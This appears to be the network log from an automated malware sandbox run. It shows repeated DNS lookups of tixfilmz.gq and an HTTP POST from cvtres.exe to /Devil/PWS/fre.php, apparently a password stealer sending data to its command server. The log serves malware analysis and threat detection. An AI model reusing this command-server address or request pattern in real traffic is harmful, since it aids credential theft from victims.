                  Aug 11, 2022 06:43:00.603039026 CEST192.168.2.38.8.8.80x2bdcStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:01.898330927 CEST192.168.2.38.8.8.80x795dStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:02.955979109 CEST192.168.2.38.8.8.80x9145Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:04.122617960 CEST192.168.2.38.8.8.80x60e6Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:05.296510935 CEST192.168.2.38.8.8.80x1fbcStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:06.496205091 CEST192.168.2.38.8.8.80x90b2Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:07.973258018 CEST192.168.2.38.8.8.80x60dbStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:09.210062981 CEST192.168.2.38.8.8.80x11c9Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:10.585853100 CEST192.168.2.38.8.8.80x519aStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:11.857250929 CEST192.168.2.38.8.8.80x3542Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:13.118525028 CEST192.168.2.38.8.8.80x4292Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:14.460020065 CEST192.168.2.38.8.8.80x5a5fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:16.765618086 CEST192.168.2.38.8.8.80xb95cStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:19.702389002 CEST192.168.2.38.8.8.80x6e31Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:24.353002071 CEST192.168.2.38.8.8.80xcf88Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:28.465460062 CEST192.168.2.38.8.8.80xd243Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:31.883057117 CEST192.168.2.38.8.8.80x829cStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:33.838053942 CEST192.168.2.38.8.8.80xb177Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:38.314882994 CEST192.168.2.38.8.8.80x4896Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:40.517680883 CEST192.168.2.38.8.8.80x86cbStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:42.718416929 CEST192.168.2.38.8.8.80xdbfeStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:45.776087999 CEST192.168.2.38.8.8.80xe80Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:47.294298887 CEST192.168.2.38.8.8.80xc54dStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:48.364883900 CEST192.168.2.38.8.8.80x4ed0Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:49.974272013 CEST192.168.2.38.8.8.80x67d6Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:51.595494986 CEST192.168.2.38.8.8.80x376fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:53.263878107 CEST192.168.2.38.8.8.80xe2e0Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:54.290009975 CEST192.168.2.38.8.8.80x102bStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:55.334676981 CEST192.168.2.38.8.8.80x84b8Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:58.292326927 CEST192.168.2.38.8.8.80x312eStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:00.089895010 CEST192.168.2.38.8.8.80x8ca9Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:01.716732025 CEST192.168.2.38.8.8.80x158eStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:03.415052891 CEST192.168.2.38.8.8.80xe735Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:04.875478029 CEST192.168.2.38.8.8.80xfad3Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:06.112749100 CEST192.168.2.38.8.8.80xe3c7Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:07.745066881 CEST192.168.2.38.8.8.80x9e07Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:08.781137943 CEST192.168.2.38.8.8.80xc274Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:09.862853050 CEST192.168.2.38.8.8.80x366bStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Aug 11, 2022 06:42:12.602015018 CEST8.8.8.8192.168.2.30x5c29No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:12.602015018 CEST8.8.8.8192.168.2.30x5c29No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:14.014944077 CEST8.8.8.8192.168.2.30xbd3dNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:14.014944077 CEST8.8.8.8192.168.2.30xbd3dNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:15.031099081 CEST8.8.8.8192.168.2.30x9c66No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:15.031099081 CEST8.8.8.8192.168.2.30x9c66No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:16.137682915 CEST8.8.8.8192.168.2.30xb56cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:16.137682915 CEST8.8.8.8192.168.2.30xb56cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:17.425028086 CEST8.8.8.8192.168.2.30x673cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:17.425028086 CEST8.8.8.8192.168.2.30x673cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:18.516221046 CEST8.8.8.8192.168.2.30xe48eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:18.516221046 CEST8.8.8.8192.168.2.30xe48eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:19.568968058 CEST8.8.8.8192.168.2.30x48edNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:19.568968058 CEST8.8.8.8192.168.2.30x48edNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:20.720654964 CEST8.8.8.8192.168.2.30x281bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:20.720654964 CEST8.8.8.8192.168.2.30x281bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:21.811207056 CEST8.8.8.8192.168.2.30x5b0eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:21.811207056 CEST8.8.8.8192.168.2.30x5b0eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:22.941586018 CEST8.8.8.8192.168.2.30x8ef0No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:22.941586018 CEST8.8.8.8192.168.2.30x8ef0No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:24.015325069 CEST8.8.8.8192.168.2.30xe554No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:24.015325069 CEST8.8.8.8192.168.2.30xe554No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:25.185749054 CEST8.8.8.8192.168.2.30x3ae7No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:25.185749054 CEST8.8.8.8192.168.2.30x3ae7No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:26.285726070 CEST8.8.8.8192.168.2.30xc3c2No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:26.285726070 CEST8.8.8.8192.168.2.30xc3c2No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:27.355494976 CEST8.8.8.8192.168.2.30x1824No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:27.355494976 CEST8.8.8.8192.168.2.30x1824No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:28.415982008 CEST8.8.8.8192.168.2.30xff45No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:28.415982008 CEST8.8.8.8192.168.2.30xff45No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:29.587415934 CEST8.8.8.8192.168.2.30x376aNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:29.587415934 CEST8.8.8.8192.168.2.30x376aNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:30.618824005 CEST8.8.8.8192.168.2.30xba56No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:30.618824005 CEST8.8.8.8192.168.2.30xba56No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:31.661487103 CEST8.8.8.8192.168.2.30x4baeNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:31.661487103 CEST8.8.8.8192.168.2.30x4baeNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:32.883007050 CEST8.8.8.8192.168.2.30x9d08No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:32.883007050 CEST8.8.8.8192.168.2.30x9d08No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:33.958312035 CEST8.8.8.8192.168.2.30x84f1No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:33.958312035 CEST8.8.8.8192.168.2.30x84f1No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:35.905409098 CEST8.8.8.8192.168.2.30x3daNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:35.905409098 CEST8.8.8.8192.168.2.30x3daNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:39.295176029 CEST8.8.8.8192.168.2.30xb3faNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:39.295176029 CEST8.8.8.8192.168.2.30xb3faNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:41.166609049 CEST8.8.8.8192.168.2.30xbca9No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:41.166609049 CEST8.8.8.8192.168.2.30xbca9No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:42.748029947 CEST8.8.8.8192.168.2.30x1213No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:42.748029947 CEST8.8.8.8192.168.2.30x1213No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:44.078478098 CEST8.8.8.8192.168.2.30x2ec5No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:44.078478098 CEST8.8.8.8192.168.2.30x2ec5No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:45.256028891 CEST8.8.8.8192.168.2.30x10fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:45.256028891 CEST8.8.8.8192.168.2.30x10fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:46.922283888 CEST8.8.8.8192.168.2.30x79bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:46.922283888 CEST8.8.8.8192.168.2.30x79bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:49.111659050 CEST8.8.8.8192.168.2.30x878fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:49.111659050 CEST8.8.8.8192.168.2.30x878fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:50.536231041 CEST8.8.8.8192.168.2.30xd021No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:50.536231041 CEST8.8.8.8192.168.2.30xd021No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:51.851875067 CEST8.8.8.8192.168.2.30x6bc7No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:51.851875067 CEST8.8.8.8192.168.2.30x6bc7No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:53.176513910 CEST8.8.8.8192.168.2.30x5202No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:53.176513910 CEST8.8.8.8192.168.2.30x5202No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:54.291218042 CEST8.8.8.8192.168.2.30x3c6fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:54.291218042 CEST8.8.8.8192.168.2.30x3c6fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:55.389997959 CEST8.8.8.8192.168.2.30x7cfaNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:55.389997959 CEST8.8.8.8192.168.2.30x7cfaNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:56.616301060 CEST8.8.8.8192.168.2.30xae31No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:56.616301060 CEST8.8.8.8192.168.2.30xae31No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:58.078123093 CEST8.8.8.8192.168.2.30x513fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:58.078123093 CEST8.8.8.8192.168.2.30x513fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:59.373456955 CEST8.8.8.8192.168.2.30x7f96No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:59.373456955 CEST8.8.8.8192.168.2.30x7f96No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:00.622443914 CEST8.8.8.8192.168.2.30x2bdcNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:00.622443914 CEST8.8.8.8192.168.2.30x2bdcNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:01.917530060 CEST8.8.8.8192.168.2.30x795dNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:01.917530060 CEST8.8.8.8192.168.2.30x795dNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:02.975430965 CEST8.8.8.8192.168.2.30x9145No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:02.975430965 CEST8.8.8.8192.168.2.30x9145No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:04.141944885 CEST8.8.8.8192.168.2.30x60e6No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:04.141944885 CEST8.8.8.8192.168.2.30x60e6No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:05.314194918 CEST8.8.8.8192.168.2.30x1fbcNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:05.314194918 CEST8.8.8.8192.168.2.30x1fbcNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:06.515471935 CEST8.8.8.8192.168.2.30x90b2No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:06.515471935 CEST8.8.8.8192.168.2.30x90b2No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:07.990590096 CEST8.8.8.8192.168.2.30x60dbNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:07.990590096 CEST8.8.8.8192.168.2.30x60dbNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:09.229652882 CEST8.8.8.8192.168.2.30x11c9No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:09.229652882 CEST8.8.8.8192.168.2.30x11c9No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:10.605609894 CEST8.8.8.8192.168.2.30x519aNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:10.605609894 CEST8.8.8.8192.168.2.30x519aNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:11.876543999 CEST8.8.8.8192.168.2.30x3542No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:11.876543999 CEST8.8.8.8192.168.2.30x3542No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:13.137489080 CEST8.8.8.8192.168.2.30x4292No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:13.137489080 CEST8.8.8.8192.168.2.30x4292No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:14.482197046 CEST8.8.8.8192.168.2.30x5a5fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:14.482197046 CEST8.8.8.8192.168.2.30x5a5fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:16.782715082 CEST8.8.8.8192.168.2.30xb95cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:16.782715082 CEST8.8.8.8192.168.2.30xb95cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:19.721796036 CEST8.8.8.8192.168.2.30x6e31No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:19.721796036 CEST8.8.8.8192.168.2.30x6e31No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:24.372870922 CEST8.8.8.8192.168.2.30xcf88No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:24.372870922 CEST8.8.8.8192.168.2.30xcf88No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:28.482649088 CEST8.8.8.8192.168.2.30xd243No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:28.482649088 CEST8.8.8.8192.168.2.30xd243No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:31.902369022 CEST8.8.8.8192.168.2.30x829cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:31.902369022 CEST8.8.8.8192.168.2.30x829cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:33.857176065 CEST8.8.8.8192.168.2.30xb177No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:33.857176065 CEST8.8.8.8192.168.2.30xb177No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:38.334461927 CEST8.8.8.8192.168.2.30x4896No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:38.334461927 CEST8.8.8.8192.168.2.30x4896No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:40.536607981 CEST8.8.8.8192.168.2.30x86cbNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:40.536607981 CEST8.8.8.8192.168.2.30x86cbNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:42.738006115 CEST8.8.8.8192.168.2.30xdbfeNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:42.738006115 CEST8.8.8.8192.168.2.30xdbfeNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:45.793565989 CEST8.8.8.8192.168.2.30xe80No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:45.793565989 CEST8.8.8.8192.168.2.30xe80No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:47.313312054 CEST8.8.8.8192.168.2.30xc54dNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:47.313312054 CEST8.8.8.8192.168.2.30xc54dNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:48.382242918 CEST8.8.8.8192.168.2.30x4ed0No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:48.382242918 CEST8.8.8.8192.168.2.30x4ed0No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:49.993833065 CEST8.8.8.8192.168.2.30x67d6No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:49.993833065 CEST8.8.8.8192.168.2.30x67d6No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:51.615442038 CEST8.8.8.8192.168.2.30x376fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:51.615442038 CEST8.8.8.8192.168.2.30x376fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:53.284096956 CEST8.8.8.8192.168.2.30xe2e0No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:53.284096956 CEST8.8.8.8192.168.2.30xe2e0No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:54.309494972 CEST8.8.8.8192.168.2.30x102bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:54.309494972 CEST8.8.8.8192.168.2.30x102bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:55.353864908 CEST8.8.8.8192.168.2.30x84b8No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:55.353864908 CEST8.8.8.8192.168.2.30x84b8No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:58.309959888 CEST8.8.8.8192.168.2.30x312eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:58.309959888 CEST8.8.8.8192.168.2.30x312eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:00.108901978 CEST8.8.8.8192.168.2.30x8ca9No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:00.108901978 CEST8.8.8.8192.168.2.30x8ca9No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:01.736135960 CEST8.8.8.8192.168.2.30x158eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:01.736135960 CEST8.8.8.8192.168.2.30x158eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:03.434765100 CEST8.8.8.8192.168.2.30xe735No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:03.434765100 CEST8.8.8.8192.168.2.30xe735No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:04.894697905 CEST8.8.8.8192.168.2.30xfad3No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:04.894697905 CEST8.8.8.8192.168.2.30xfad3No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:06.132136106 CEST8.8.8.8192.168.2.30xe3c7No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:06.132136106 CEST8.8.8.8192.168.2.30xe3c7No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:07.762610912 CEST8.8.8.8192.168.2.30x9e07No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:07.762610912 CEST8.8.8.8192.168.2.30x9e07No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:08.800934076 CEST8.8.8.8192.168.2.30xc274No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:08.800934076 CEST8.8.8.8192.168.2.30xc274No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:09.882337093 CEST8.8.8.8192.168.2.30x366bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:09.882337093 CEST8.8.8.8192.168.2.30x366bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  • tixfilmz.gq
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349742188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:12.661274910 CEST1026OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 190
                  Connection: close
